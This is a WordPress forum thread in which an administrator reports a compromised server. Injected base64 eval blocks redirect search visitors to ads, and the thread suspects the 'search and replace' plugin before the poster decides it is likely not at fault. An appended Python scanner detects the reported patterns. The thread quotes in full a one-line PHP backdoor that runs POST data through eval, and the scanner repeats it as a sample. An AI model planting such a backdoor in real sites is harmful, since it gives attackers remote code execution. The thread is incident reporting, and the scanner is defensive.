Search & Replace
Possible security issue in "search and replace" 2.6 (4 posts)

  1. louisremi
    Posted 3 years ago #


    One of the servers I'm administrating was corrupted. We aren't exactly sure about what happened yet, but here's what we've found:
    - There's a block of code beginning with <?php eval(base64_decode("DQplcnJvcl... at the top of each php file on the server. This code redirects visitors to ads when their referrer is a search engine.
    - There's a single backdoor in the theme of a WordPress installed on the server: <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>. Since this code is only present once on the server, we think the origin of the exploit can be narrowed down to this WordPress install.
    - There are several plugins installed on this WordPress, including "search and replace", but search-and-replace.php is the only file on the server that is riddled with <?php eval(base64_decode("DQplcnJvcl... blocks (not just one at the top), see this pastebin: http://pastebin.com/jmynTEgx

    I just wanted to let you know and see if other users had similar troubles.


  2. NFWRo
    Posted 3 years ago #

    I was just about to use this plugin, but have read this and am now rather concerned. Did this plugin prove to be the problem? Has anyone else encountered it?

  3. louisremi
    Posted 3 years ago #


    We haven't been able to gather more information about our security issue, and as you can see, no one else reported similar problems.
    I guess this plugin is not to blame after all.

  4. NFWRo
    Posted 3 years ago #

    Thanks for the update - that's good to know.

Topic Closed

This topic has been closed to new replies.
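
A defensive sweep for the two code shapes reported in this thread, added here as an example (not posted by any participant and not part of the plugin): it counts hard-coded eval(base64_decode( blocks per PHP file, notes whether one sits at the very top, and separately flags the form that evaluates request data. The function names and sample strings are constructed for illustration, and the payload is a harmless placeholder.

```python
import re
from pathlib import Path

# eval(base64_decode(...)) in any spacing/case, as in the blocks described in the thread
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
# Same call fed directly from request data: the backdoor shape from the thread
REQUEST_EVAL = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)
# A block that is the first thing in the file (optionally after a BOM/whitespace)
LEADING = re.compile(r"\A\ufeff?\s*<\?php\s*eval\s*\(\s*base64_decode\s*\(", re.I)


def scan_source(text):
    """Return the findings for one PHP source string."""
    total = len(EVAL_B64.findall(text))
    from_request = len(REQUEST_EVAL.findall(text))
    return {
        "static_blocks": total - from_request,   # hard-coded encoded payloads
        "request_eval": from_request,            # evaluates attacker-supplied input
        "leading_block": bool(LEADING.match(text)),
    }


def scan_tree(root):
    """Scan every *.php file under root; return {path: findings} for hits only."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        result = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if result["static_blocks"] or result["request_eval"]:
            hits[str(path)] = result
    return hits


# Constructed samples (payload is a placeholder, not the real injected code)
PREPENDED = '<?php eval(base64_decode("Q09OU1RSVUNURUQ=")); ?>\n<?php echo "page"; ?>\n'
RIDDLED = PREPENDED + 'function a() {}\n<?php eval(base64_decode("Q09OU1RSVUNURUQ=")); ?>\n'
BACKDOOR = '<?php get_header(); if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>'
CLEAN = '<?php echo base64_decode("aGVsbG8="); ?>'

if __name__ == "__main__":
    for name, src in [("prepended", PREPENDED), ("riddled", RIDDLED),
                      ("backdoor", BACKDOOR), ("clean", CLEAN)]:
        print(name, scan_source(src))
```

A file with `static_blocks` greater than 1 matches what the first post reports for search-and-replace.php, while `request_eval` marks the single theme backdoor; a plain `base64_decode` call without `eval` is not flagged.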
